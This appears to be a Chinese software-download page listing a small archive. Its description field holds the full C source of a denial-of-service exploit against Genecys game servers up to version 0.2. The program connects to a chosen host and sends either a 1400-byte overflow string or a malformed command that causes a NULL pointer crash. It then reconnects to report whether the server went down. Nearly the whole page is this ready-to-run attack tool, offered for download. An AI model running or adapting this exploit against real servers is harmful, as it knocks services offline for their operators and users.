| 软件名称: |
genecysbof.zip |
| 文件类型: |
|
|
| 界面语言: |
简体中文 |
| 软件类型: |
国产软件 |
| 运行环境: |
WinNT/2K/Xp |
| 授权方式: |
共享软件 |
| 软件大小: |
8K |
| 软件等级: |
★★★★☆ |
| 发布时间: |
2006-05-15 |
| 官方网址: |
http://www.milw0rm.com 作者:Luigi |
| 演示网址: |
|
| 软件说明: |
|
Genecys <= 0.2 (BoF/NULL pointer) Denial of Service Exploit
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
#define VER "0.1"
#define PORT 5501
#define BUFFSZ 8192 // max
#define BOFSZ 1400 // too big, dest buffer is 256
void genecys_send(int sd, u_char *buff, u_char *cmd, ...);
int genecys_recv(int sd, u_char *buff, int size);
int mycpy(u_char *dst, u_char *src);
u_int resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
attack,
i;
u_short port = PORT;
u_char buff[BUFFSZ],
bof[BOFSZ];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"Genecys <= 0.2 buffer-overflow and NULL pointer crash "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attack:\n"
" 1 = tell_player_surr_changes buffer-overflow\n"
" 2 = parse_command NULL pointer crash\n"
"\n", argv[0], port);
exit(1);
}
attack = atoi(argv[1]);
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
printf("- connect ...");
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
printf(" done\n");
genecys_recv(sd, buff, sizeof(buff));
printf("- %s\n", buff);
if(attack == 2) {
printf("- parse_command NULL pointer crash\n");
genecys_send(
sd,
buff,
"adpl",
"nm", // no ':'!!!
NULL);
} else {
printf("- tell_player_surr_changes buffer-overflow\n");
memset(bof, 'a', sizeof(bof) - 1);
bof[sizeof(bof) - 1] = 0;
genecys_send(
sd,
buff,
"adpl",
"nm", bof,
"user", "myusername",
"pass", "mypassword",
NULL);
}
printf("- wait some seconds:\n");
for(i = 3; i; i--) {
printf("%d\r", i);
sleep(ONESEC);
}
close(sd);
sleep(ONESEC);
printf("- check server:\n");
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
printf("\n Server IS vulnerable!!!\n\n");
} else {
printf("\n Server doesn't seem vulnerable\n\n");
}
close(sd);
return(0);
}
void genecys_send(int sd, u_char *buff, u_char *cmd, ...) {
va_list ap;
int cv;
u_char *s,
*p;
p = buff;
p += mycpy(p, cmd);
va_start(ap, cmd);
for(cv = 0; (s = va_arg(ap, u_char *)); cv++) {
*p++ = (cv & 1) ? ':' : ' '; // this method is used ONLY for a simpler attack 2
p += mycpy(p, s);
}
va_end(ap);
*p++ = '\r';
if(send(sd, buff, p - buff, 0)
< 0) std_err();
}
int genecys_recv(int sd, u_char *buff, int size) {
int t,
len;
for(len = 0, size--; size; size--, len++, buff++) {
t = recv(sd, buff, 1, 0);
if(t < 0) std_err();
if(!t) break;
if(*buff == '\r') break;
}
*buff = 0;
return(len);
}
int mycpy(u_char *dst, u_char *src) {
u_char *p;
for(p = dst; *src; src++, p++) {
*p = *src;
}
*p = 0;
return(p - dst);
}
u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif |
|
| 下载地址: |
进入下载地址列表
|
| 下载说明: |
☉推荐使用网际快车下载本站软件,使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源,如果服务器暂不能下载请过一段时间重试!
☉如果遇到什么问题,请到本站论坛去咨寻,我们将在那里提供更多 、更好的资源!
☉本站提供的一些商业软件是供学习研究之用,如用于商业用途,请购买正版。 |
|
推荐
评论(0条)
